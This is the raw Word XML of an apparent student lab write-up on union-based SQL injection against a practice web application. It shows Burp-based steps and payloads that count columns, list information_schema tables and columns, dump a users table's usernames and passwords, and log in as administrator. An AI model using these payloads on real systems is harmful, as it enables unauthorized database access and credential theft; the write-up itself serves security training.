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4CAE" w14:textId="77777777" w:rsidR="00852DF3" w:rsidRDefault="00852DF3"/>
    <w:p w14:paraId="14CACC6D" w14:textId="77777777" w:rsidR="00DA00B6" w:rsidRDefault="00DA00B6" w:rsidP="00DA00B6">
      <w:r>
        <w:t xml:space="preserve">To Access the Lab – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075D1253" w14:textId="355F2E59" w:rsidR="00DA00B6" w:rsidRDefault="00DA00B6" w:rsidP="00DA00B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16BC8EE2" wp14:editId="4921EBC8">
            <wp:extent cx="5731510" cy="3293110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="175471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9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CD2E" w14:textId="77777777" w:rsidR="00DA00B6" w:rsidRDefault="00DA00B6" w:rsidP="00DA00B6"/>
    <w:p w14:paraId="1894A2EB" w14:textId="77777777" w:rsidR="00DA00B6" w:rsidRDefault="00DA00B6" w:rsidP="00DA00B6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intercept the request on Burp and send to repeater,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B479924" w14:textId="6334EFE3" w:rsidR="00DA00B6" w:rsidRDefault="00DA00B6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On repeater, URL – We can use the </w:t>
      </w:r>
      <w:r w:rsidR="0006631B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Union based </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi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to d</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74838">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etermine the number of columns that are being returned by the query and which columns contain text data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250E5D38" w14:textId="77777777" w:rsidR="00FD2CB1" w:rsidRDefault="00FD2CB1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9DFDF7" w14:textId="3865A807" w:rsidR="00FD2CB1" w:rsidRDefault="00FD2C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EBE6AA" wp14:editId="5E1D9FE8">
            <wp:extent cx="5731510" cy="4427220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="47317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4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AE1" w14:textId="37373BB7" w:rsidR="00FD2CB1" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here we can see that for 2 columns, we are getting a 200 response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61364779" w14:textId="7F87F970" w:rsidR="00FD2CB1" w:rsidRDefault="00FD2CB1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E793640" wp14:editId="2BD2506D">
            <wp:extent cx="5731510" cy="2388870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="115765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0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8A9E" w14:textId="656F3F9A" w:rsidR="0006631B" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we can see that for 3 columns, we are getting a 500 ISE response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C2AF5D" w14:textId="77777777" w:rsidR="0006631B" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046E52B3" w14:textId="6DB54B92" w:rsidR="0006631B" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This means that there are 2 columns. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C055EF" w14:textId="77777777" w:rsidR="00FD2CB1" w:rsidRDefault="00FD2CB1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6926E888" w14:textId="77777777" w:rsidR="000361EB" w:rsidRDefault="000361EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="121E7C08" w14:textId="0DC3F6A5" w:rsidR="0006631B" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF8FE13" w14:textId="7167E52B" w:rsidR="0006631B" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next, we can find out which columns print out data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB51EF3" w14:textId="2885911F" w:rsidR="000361EB" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006631B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessories’+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006631B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>union+select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006631B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0006631B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006631B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’.’def’--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6760BC" w14:textId="030971C4" w:rsidR="000361EB" w:rsidRDefault="000361EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C5E1DBC" wp14:editId="0DB8FF04">
            <wp:extent cx="4590705" cy="3476445"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="195065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394" cy="3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6F44" w14:textId="3F2474E8" w:rsidR="0006631B" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we can see </w:t>
      </w:r>
      <w:r w:rsidR="00D25339">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that both columns print out data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCBD26" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDBBC98" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB54717" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D52677A" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448BE4D9" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2FB19A" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE3B2FD" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1C0C27" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB1B70A" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A72FAA" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67EAB8C4" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9E1AE5" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52935A4F" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62433AF8" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77290657" w14:textId="24180B4C" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next, we can print out the tables present in this database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDED02E" w14:textId="483A1449" w:rsidR="008C6CD3" w:rsidRPr="00D25339" w:rsidRDefault="000361EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'+UNION+SELECT+table_name,+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D25339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL+FROM+information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D25339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641687FD" w14:textId="234C4B5F" w:rsidR="000361EB" w:rsidRDefault="000361EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40F430C9" wp14:editId="6ACEECC0">
            <wp:extent cx="5731510" cy="5749925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="206835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5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6F1C" w14:textId="0A1F2ECE" w:rsidR="000361EB" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we can see a list of tables in this database, we can find one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users_rfdrlc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC2450" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EF3FDF" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFF360A" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C34B2D3" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E45D46F" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C926D1D" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DB4EB4" w14:textId="77777777" w:rsidR="00D25339" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275F3308" w14:textId="7E210FB4" w:rsidR="008C6CD3" w:rsidRPr="00D25339" w:rsidRDefault="00E60684">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'+union+select+column_name,+null+from+information_schema.columns+where+table_name%3d'users_rfdrlc'—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB9714" w14:textId="54121087" w:rsidR="00E60684" w:rsidRDefault="00E60684">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5410E40F" wp14:editId="25396591">
            <wp:extent cx="4719915" cy="3683480"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="92973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38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312" cy="36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EF2" w14:textId="77777777" w:rsidR="00E60684" w:rsidRDefault="00E60684">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1407FCA5" w14:textId="38DFA6A5" w:rsidR="00A028DB" w:rsidRPr="00D25339" w:rsidRDefault="00A028DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25339">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessories'+union+select+username_fgkaxj,password_bpkufp+from+users_rfdrlc+--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69330101" w14:textId="64BA7C38" w:rsidR="00D25339" w:rsidRDefault="00A028DB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D818565" wp14:editId="2414071F">
            <wp:extent cx="4619656" cy="3735237"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85525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59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391" cy="37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72FC" w14:textId="613C7005" w:rsidR="00A028DB" w:rsidRDefault="00D25339">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Next, we can login to the administrator account using these credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A9250" w14:textId="2C5215FA" w:rsidR="0006631B" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6421D1E3" wp14:editId="3C4A435E">
            <wp:extent cx="5731510" cy="2480310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="76787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73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065A" w14:textId="77777777" w:rsidR="0006631B" w:rsidRDefault="0006631B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E61968A" w14:textId="0F797728" w:rsidR="0097681A" w:rsidRDefault="0097681A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE854B6" w14:textId="1369F7A0" w:rsidR="0097681A" w:rsidRDefault="0097681A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08240F1E" w14:textId="77777777" w:rsidR="0097681A" w:rsidRDefault="0097681A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334B787C" w14:textId="77777777" w:rsidR="0097681A" w:rsidRPr="00DA00B6" w:rsidRDefault="0097681A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0097681A" w:rsidRPr="00DA00B6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7E97" w14:textId="77777777" w:rsidR="00E37083" w:rsidRDefault="00E37083" w:rsidP="00A46343">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="327821E3" w14:textId="77777777" w:rsidR="00E37083" w:rsidRDefault="00E37083" w:rsidP="00A4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6E9D" w14:textId="77777777" w:rsidR="00601C3C" w:rsidRPr="006D5470" w:rsidRDefault="00601C3C" w:rsidP="00601C3C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5FB166A1" w14:textId="1A4B54F7" w:rsidR="00601C3C" w:rsidRPr="00601C3C" w:rsidRDefault="00601C3C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6E5E" w14:textId="77777777" w:rsidR="00E37083" w:rsidRDefault="00E37083" w:rsidP="00A46343">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03742BB2" w14:textId="77777777" w:rsidR="00E37083" w:rsidRDefault="00E37083" w:rsidP="00A46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1A4D" w14:textId="5F43242D" w:rsidR="00A46343" w:rsidRPr="00A46343" w:rsidRDefault="00A46343">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="006D5470">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>WebSecurity</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="006D5470">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> Lab - </w:t>
    </w:r>
    <w:r w:rsidR="00DA00B6" w:rsidRPr="00DA00B6">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">SQL injection attack, listing the database </w:t>
    </w:r>
    <w:r w:rsidR="00DA00B6">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>c</w:t>
    </w:r>
    <w:r w:rsidR="00DA00B6" w:rsidRPr="00DA00B6">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>ontents on non-Oracle databases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F3"/>
    <w:rsid w:val="000361EB"/>
    <w:rsid w:val="0006631B"/>
    <w:rsid w:val="00396D15"/>
    <w:rsid w:val="00555F9C"/>
    <w:rsid w:val="005A53B5"/>
    <w:rsid w:val="00601C3C"/>
    <w:rsid w:val="00852DF3"/>
    <w:rsid w:val="008C6CD3"/>
    <w:rsid w:val="0097681A"/>
    <w:rsid w:val="00A028DB"/>
    <w:rsid w:val="00A46343"/>
    <w:rsid w:val="00D25339"/>
    <w:rsid w:val="00DA00B6"/>
    <w:rsid w:val="00E37083"/>
    <w:rsid w:val="00E60684"/>
    <w:rsid w:val="00EB3F69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1416"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6D88CC7C-23FC-44EF-8EC2-CA55D535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43"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A46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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-23T18:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-31T08:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>